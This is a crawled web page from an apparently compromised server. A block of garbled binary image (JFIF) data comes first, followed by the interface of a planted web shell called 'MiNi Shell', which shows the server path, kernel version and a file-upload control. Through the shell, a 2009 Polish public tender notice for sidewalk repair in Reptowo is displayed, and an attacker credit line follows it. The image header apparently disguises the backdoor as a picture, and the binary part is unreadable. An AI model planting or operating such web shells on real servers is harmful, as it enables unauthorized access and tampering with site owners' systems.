JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090731/124495-N-2009.html

<p class="kh_header"><b>Stargard Szczeciński: Remont chodnika w miejscowości Reptowo</b><br>
<b>Numer ogłoszenia: 124495 - 2009; data zamieszczenia: 31.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Bydgoska 13/15, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5775219, faks 091 5775219.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpstargard.rii.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont chodnika w miejscowości Reptowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie remontu istniejącego chodnika i zjazdów do posesji w ciągu drogi powiatowej numer 1702Z w miejscowości Reptowo, gmina Kobylanka, odcinek numer 1: chodnik o powierzchni 149 m2, zjazd do posesji o powierzchni 43 m2, odcinek numer 2: chodnik o powierzchni 154 m2, zjazd do posesji o powierzchni 170 m2. Zakres przedmiotu zamówienia obejmuje:
Odcinek numer 1 (od skrzyżowania wzdłuż remizy i świetlicy) :
1. cięcie wzdłuż wyznaczonej krawędzi i rozbiórka istniejącej nawierzchni z mas mineralno - bitumicznych o grubości warstwy do 10 cm wraz z podbudową , z załadunkiem i wywózką powstałego gruzu do miejsca które Wykonawca sam sobie zapewni, ilość - 20 m2
2. rozbiórka istniejącej nawierzchni z mas mineralno - bitumicznych oraz betonowej o grubości warstwy do 10 cm wraz z podbudową, z załadunkiem i wywózką powstałego gruzu do miejsca które Wykonawca sam sobie zapewni, ilość - 39 m2
3. rozbiórka nawierzchni chodnika z płyt betonowych o powierzchni do 1,5 m2 o grubości do 10 cm wraz z odbudową, z załadunkiem i wywózką powstałego gruzu do miejsca które Wykonawca sam sobie zapewni , ilość - 97 m2
4. rozbiórka cokołów betonowych o szerokości 25 cm stanowiących ogrodzenie strażnicy OSP wraz z demontażem słupków z rur stalowych O 2  i wysokości do 1,7 m, wraz z załadunkiem i wywózką powstałego gruzu oraz złomu do miejsca które Wykonawca sam sobie zapewni, ilość - 30 m
5. wykonanie nawierzchni zjazdu z brukowej kostki betonowej gr. 8,0 cm typu POL-BRUK na podsypce cementowo - piaskowej  1; 4 gr. 3,0 cm, na podbudowie betonowej z betonu B - 20 gr. 22 cm, warstwa odsączająca gr. 15,0 cm, kostka koloru czerwonego - ilość 43 m2 
6. wykonanie nawierzchni chodników z brukowej kostki betonowej gr. 6,0 cm typu POL-BRUK na podsypce cementowo - piaskowej  1; 4 gr. 3,0 cm, warstwa odsączająca gr. 15,0 cm, kostka koloru szarego - ilość 149 m2 
7. ustawienie zgodnie z rysunkiem numer 1 krawężnika betonowego ściętego 15 * 30 * 100 cm na ławie betonowej z oporem 25 * 35 cm , ława z betonu B- 15 , warstwa odsączająca gr. 15,0 cm - ilość 43 m
8. ustawienie zgodnie z rysunkiem numer 1 krawężnika betonowego skośnego 15 * 22/30 * 100 cm na ławie betonowej z oporem 25 * 35 cm , ława z betonu B- 15 , warstwa odsączająca gr. 15,0 cm - ilość 5 m
9. ustawienie zgodnie z rysunkiem numer 1 krawężnika betonowego wjazdowego 15 * 22 * 100 cm na ławie betonowej z oporem 25 * 35 cm , ława z betonu B- 15, warstwa odsączająca gr. 15,0 cm - ilość 31 m
10. ustawienie zgodnie z rysunkiem numer 1 opornika betonowego prostokątnego 12 * 25 * 100 cm na ławie betonowej z oporem 25 * 35 cm , ława z betonu B- 15, warstwa odsączająca gr. 15,0 cm - ilość 10 m 
11. ustawienie zgodnie z rysunkiem numer 1 obrzeża betonowego 8 * 30 * 75 cm na podsypce cementowo - piaskowej  12 * 5 cm, warstwa odsączająca gr. 15,0 cm - ilość 86 m
12. uzupełnienie powstałej szczeliny pomiędzy istniejącą jezdnią a nowo ustawionym krawężnikiem, asfaltem lanym
13. nawiezienie i rozplantowanie humusu o grubości warstwy minimum 5,0 cm z wykonaniem trawników siewem wraz z nawożeniem ( pas zielenie wzdłuż wykonanego chodnika) - ilość 102 m2 
14. karczowanie pni drzew wraz z wywózka karpiny i pozostałości do miejsca które Wykonawca sam sobie zapewni. Pnie drzew o średnicy do 75 cm pochodzące z wcześniejszej wycinki - 2 szt.
15. regulacja w pionie istniejących studni telefonicznych SKR - 1 i SKR - 2 do poziomu nawierzchni chodnika - 2 szt.
16. wykonanie i zatwierdzenie tymczasowego oznakowania i zabezpieczenia terenu robót 
17. wykonanie badań i sprawdzeń ujętych w szczegółowych specyfikacjach technicznych
Odcinek numer 2 (kontynuacja zdania z 2008 r. w kierunku Cisewa) :
1. cięcie wzdłuż wyznaczonej krawędzi i rozbiórka istniejącej nawierzchni z mas mineralno - bitumicznych o grubości warstwy do 10 cm wraz z podbudową , z załadunkiem i wywózką powstałego gruzu do miejsca które Wykonawca sam sobie zapewni, ilość - 23 m2
2. wykonanie nawierzchni zjazdów z brukowej kostki betonowej gr. 8,0 cm typu POL-BRUK na podsypce cementowo - piaskowej  1; 4 gr. 3,0 cm, na podbudowie betonowej z betonu B - 10 gr. 15 cm, warstwa odsączająca gr. 15,0 cm, kostka koloru czerwonego - ilość 170 m2 
3. wykonanie nawierzchni chodników z brukowej kostki betonowej gr. 6,0 cm typu POL-BRUK na podsypce cementowo - piaskowej  1; 4 gr. 3,0 cm, warstwa odsączająca gr. 15,0 cm, kostka koloru szarego - ilość 154 m2 
4. ustawienie zgodnie z rysunkiem numer 2 opornika betonowego prostokątnego 12 * 25 * 100 cm na ławie betonowej z oporem 25 * 35 cm , ława z betonu B- 15, warstwa odsączająca gr. 15,0 cm - ilość 190 m
5. ustawienie zgodnie z rysunkiem numer 2 obrzeża betonowego 8 * 30 * 75 cm na podsypce cementowo - piaskowej  12 * 5 cm, warstwa odsączająca gr. 15,0 cm - ilość 195 m
6. uzupełnienie powstałej szczeliny pomiędzy istniejącą jezdnią a nowo ustawionym opornikiem betonowym, asfaltem lanym
7. regulacja w pionie istniejących studni telefonicznych SKR - 1 i SKR - 2 do poziomu nawierzchni chodnika - 3 szt.
8. regulacja w pionie istniejących studni rewizyjnych na sieci kanalizacyjnej do poziomu nawierzchni chodnika - 4 szt.
9. regulacja w pionie istniejących zaworów gazowych do poziomu nawierzchni chodnika  - 4 szt.
10. wykonanie i zatwierdzenie tymczasowego oznakowania i zabezpieczenia terenu robót 
11. wykonanie badań i sprawdzeń ujętych w szczegółowych specyfikacjach technicznych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.51-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania Zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z Postępowania, zgodnie z art. 24 ustawy.
2. Ocena spełnienia warunków szczegółowych udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń podanych niżej.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
1. Formularz oferty wraz z kosztorysem ofertowym.
2. Oświadczenie Wykonawcy złożone zgodnie z art. 22 ust. 1 Prawa zamówień publicznych stwierdzające, że:
1) posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlega wykluczeniu z postępowania na podstawie art. 24 Prawa zamówień publicznych.
3. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych, należy złożyć następujące dokumenty:
1)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Aktualność w/w dokumentu musi być potwierdzona przez organ je wydający z datą nie wcześniejszą niż 6 m-cy przed upływem terminu składania ofert.
4. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, należy złożyć następujące dokumenty:
1) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności.
Wykaz osób z właściwymi uprawnieniami winien obejmować kierownika dla robót drogowych. 
2) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 1, Wykonawca wskazał osoby, którymi będzie dysponował,
3)  dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, tj.: 
a) stwierdzenie przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie przez osoby w nim wymienione;
b) zaświadczenie o przynależności do okręgowej izby inżynierów budownictwa na dzień składania ofert.
4) wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości, dat i miejsca wykonania wg wzoru załącznika nr 4 oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie.
Wymagana jest minimum jedna robota, która swoim rodzajem odpowiada przedmiotowi zamówienia i jest o wartości nie mniejszej niż 100 000,00 zł. (słownie: sto tysięcy złotych).
5. Pozostałe dokumenty wymagane wraz z ofertą:
1)    upoważnienie osób podpisujących ofertę do reprezentacji Wykonawcy, w przypadku gdy ofertę podpisują osoby inne niż wymienione w wypisie z właściwego rejestru bądź innym dokumencie dopuszczającym Wykonawcę do obrotu prawnego,
2) pełnomocnictwo dla podmiotu występującego w postępowaniu w imieniu grupy wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdpstargard.rii.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych ul. Bydgoska 13/15 73-110 Stargard Szczeciński.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 10:00, miejsce: Zarząd Dróg Powiatowych ul. Bydgoska 13/15 73-110 Stargard Szczeciński pok. nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com